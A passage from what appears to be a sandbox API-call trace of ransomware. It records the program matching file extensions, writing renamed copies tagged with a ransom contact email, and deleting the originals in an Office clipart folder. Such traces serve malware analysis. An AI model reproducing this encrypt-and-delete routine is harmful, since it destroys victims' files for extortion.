lpString2=".WMF") returned -1 [0185.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107728.WMF") returned 68 [0185.007] lstrlenW (lpString=".jpg") returned 4 [0185.007] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.008] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.008] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0185.009] GetLastError () returned 0x0 [0185.009] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xe3c, lpOverlapped=0x0) returned 1 [0185.020] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xe40, lpOverlapped=0x0) returned 1 [0185.021] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.021] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.021] SetEndOfFile (hFile=0x3a0) returned 1 [0185.022] CloseHandle (hObject=0x3a0) returned 1 [0185.022] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.022] SetEndOfFile (hFile=0x39c) returned 1 [0185.023] CloseHandle (hObject=0x39c) returned 1 [0185.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.023] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107742.wmf")) returned 1 [0185.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF") returned 68 [0185.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF") returned 68 [0185.024] lstrlenW (lpString=".doc") returned 4 [0185.024] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.024] lstrlenW (lpString=".docx") returned 5 [0185.024] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0185.024] lstrlenW (lpString=".pdf") returned 4 [0185.024] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.024] lstrlenW (lpString=".xls") returned 4 [0185.025] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.025] lstrlenW (lpString=".xlsx") returned 5 [0185.025] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0185.025] lstrlenW (lpString=".ppt") returned 4 [0185.025] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF") returned 68 [0185.025] lstrlenW (lpString=".zip") returned 4 [0185.025] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.025] lstrlenW (lpString=".rar") returned 4 [0185.025] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.025] lstrlenW (lpString=".bz2") returned 4 [0185.025] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.025] lstrlenW (lpString=".7z") returned 3 [0185.025] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF") returned 68 [0185.025] lstrlenW (lpString=".dbf") returned 4 [0185.025] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF") returned 68 [0185.025] lstrlenW (lpString=".1cd") returned 4 [0185.025] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107742.WMF") returned 68 [0185.025] lstrlenW (lpString=".jpg") returned 4 [0185.025] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.026] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.026] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0185.027] GetLastError () returned 0x0 [0185.027] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x12b4, lpOverlapped=0x0) returned 1 [0185.372] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x12c0, lpOverlapped=0x0) returned 1 [0185.373] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.373] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.373] SetEndOfFile (hFile=0x3a0) returned 1 [0185.373] CloseHandle (hObject=0x3a0) returned 1 [0185.374] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.374] SetEndOfFile (hFile=0x39c) returned 1 [0185.374] CloseHandle (hObject=0x39c) returned 1 [0185.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0185.375] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107746.wmf")) returned 1 [0185.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF") returned 68 [0185.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF") returned 68 [0185.375] lstrlenW (lpString=".doc") returned 4 [0185.375] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0185.375] lstrlenW (lpString=".docx") returned 5 [0185.375] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0185.375] lstrlenW (lpString=".pdf") returned 4 [0185.375] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0185.375] lstrlenW (lpString=".xls") returned 4 [0185.376] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0185.376] lstrlenW (lpString=".xlsx") returned 5 [0185.376] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0185.376] lstrlenW (lpString=".ppt") returned 4 [0185.376] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0185.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF") returned 68 [0185.376] lstrlenW (lpString=".zip") returned 4 [0185.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0185.376] lstrlenW (lpString=".rar") returned 4 [0185.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0185.376] lstrlenW (lpString=".bz2") returned 4 [0185.376] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0185.376] lstrlenW (lpString=".7z") returned 3 [0185.376] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0185.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF") returned 68 [0185.376] lstrlenW (lpString=".dbf") returned 4 [0185.376] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0185.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF") returned 68 [0185.376] lstrlenW (lpString=".1cd") returned 4 [0185.376] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0185.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107746.WMF") returned 68 [0185.376] lstrlenW (lpString=".jpg") returned 4 [0185.376] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0185.377] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.377] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0185.377] GetLastError () returned 0x0 [0185.377] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x45cb, lpOverlapped=0x0) returned 1 [0188.051] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x45d0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x45d0, lpOverlapped=0x0) returned 1 [0188.052] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.052] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.052] SetEndOfFile (hFile=0x3a0) returned 1 [0188.053] CloseHandle (hObject=0x3a0) returned 1 [0188.053] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.053] SetEndOfFile (hFile=0x39c) returned 1 [0188.054] CloseHandle (hObject=0x39c) returned 1 [0188.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0188.054] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145373.jpg")) returned 1 [0188.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG") returned 68 [0188.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG") returned 68 [0188.055] lstrlenW (lpString=".doc") returned 4 [0188.055] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0188.055] lstrlenW (lpString=".docx") returned 5 [0188.055] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0188.055] lstrlenW (lpString=".pdf") returned 4 [0188.055] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0188.055] lstrlenW (lpString=".xls") returned 4 [0188.055] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0188.055] lstrlenW (lpString=".xlsx") returned 5 [0188.055] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0188.055] lstrlenW (lpString=".ppt") returned 4 [0188.055] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0188.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG") returned 68 [0188.055] lstrlenW (lpString=".zip") returned 4 [0188.055] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0188.055] lstrlenW (lpString=".rar") returned 4 [0188.055] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0188.055] lstrlenW (lpString=".bz2") returned 4 [0188.055] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0188.055] lstrlenW (lpString=".7z") returned 3 [0188.055] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0188.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG") returned 68 [0188.055] lstrlenW (lpString=".dbf") returned 4 [0188.056] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0188.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG") returned 68 [0188.056] lstrlenW (lpString=".1cd") returned 4 [0188.056] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0188.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145373.JPG") returned 68 [0188.056] lstrlenW (lpString=".jpg") returned 4 [0188.056] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0188.056] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.056] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0188.057] GetLastError () returned 0x0 [0188.057] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x8a5b, lpOverlapped=0x0) returned 1 [0188.060] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x8a60, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x8a60, lpOverlapped=0x0) returned 1 [0188.278] ReadFile (in: hFile=0x39c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0188.278] WriteFile (in: hFile=0x3a0, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0188.278] SetEndOfFile (hFile=0x3a0) returned 1 [0188.279] CloseHandle (hObject=0x3a0) returned 1 [0188.279] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0188.279] SetEndOfFile (hFile=0x39c) returned 1 [0188.280] CloseHandle (hObject=0x39c) returned 1 [0188.280] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0189.518] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145879.jpg")) returned 1 [0189.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG") returned 68 [0189.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG") returned 68 [0189.519] lstrlenW (lpString=".doc") returned 4 [0189.519] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0189.519] lstrlenW (lpString=".docx") returned 5 [0189.519] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0189.519] lstrlenW (lpString=".pdf") returned 4 [0189.519] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0189.519] lstrlenW (lpString=".xls") returned 4 [0189.519] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0189.519] lstrlenW (lpString=".xlsx") returned 5 [0189.519] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0189.519] lstrlenW (lpString=".ppt") returned 4 [0189.519] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0189.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG") returned 68 [0189.519] lstrlenW (lpString=".zip") returned 4 [0189.519] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0189.519] lstrlenW (lpString=".rar") returned 4 [0189.519] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0189.519] lstrlenW (lpString=".bz2") returned 4 [0189.519] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0189.519] lstrlenW (lpString=".7z") returned 3 [0189.519] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0189.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG") returned 68 [0189.519] lstrlenW (lpString=".dbf") returned 4 [0189.519] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0189.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG") returned 68 [0189.519] lstrlenW (lpString=".1cd") returned 4 [0189.520] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0189.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145879.JPG") returned 68 [0189.520] lstrlenW (lpString=".jpg") returned 4 [0189.520] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0189.520] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.520] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0189.521] GetLastError () returned 0x0 [0189.521] ReadFile (in: hFile=0x35c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x3c68, lpOverlapped=0x0) returned 1 [0190.525] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3c70, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3c70, lpOverlapped=0x0) returned 1 [0190.742] ReadFile (in: hFile=0x35c, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0190.742] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0190.742] SetEndOfFile (hFile=0x390) returned 1 [0190.742] CloseHandle (hObject=0x390) returned 1 [0190.742] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.742] SetEndOfFile (hFile=0x35c) returned 1 [0190.743] CloseHandle (hObject=0x35c) returned 1 [0190.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0190.896] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151045.wmf")) returned 1 [0190.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF") returned 68 [0190.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF") returned 68 [0190.897] lstrlenW (lpString=".doc") returned 4 [0190.897] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0190.897] lstrlenW (lpString=".docx") returned 5 [0190.897] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0190.897] lstrlenW (lpString=".pdf") returned 4 [0190.897] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0190.897] lstrlenW (lpString=".xls") returned 4 [0190.897] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0190.897] lstrlenW (lpString=".xlsx") returned 5 [0190.897] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0190.897] lstrlenW (lpString=".ppt") returned 4 [0190.897] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0190.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF") returned 68 [0190.897] lstrlenW (lpString=".zip") returned 4 [0190.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0190.897] lstrlenW (lpString=".rar") returned 4 [0190.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0190.897] lstrlenW (lpString=".bz2") returned 4 [0190.897] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0190.897] lstrlenW (lpString=".7z") returned 3 [0190.897] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0190.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF") returned 68 [0190.897] lstrlenW (lpString=".dbf") returned 4 [0190.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0190.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF") returned 68 [0190.898] lstrlenW (lpString=".1cd") returned 4 [0190.898] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0190.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151045.WMF") returned 68 [0190.898] lstrlenW (lpString=".jpg") returned 4 [0190.898] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0190.898] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.898] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0151055.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0151055.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0190.899] GetLastError () returned 0x0 [0190.899] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x3928, lpOverlapped=0x0) returned 1 [0191.145] WriteFile (in: hFile=0x334, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x3930, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x3930, lpOverlapped=0x0) returned 1 [0191.149] ReadFile (in: hFile=0x390, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 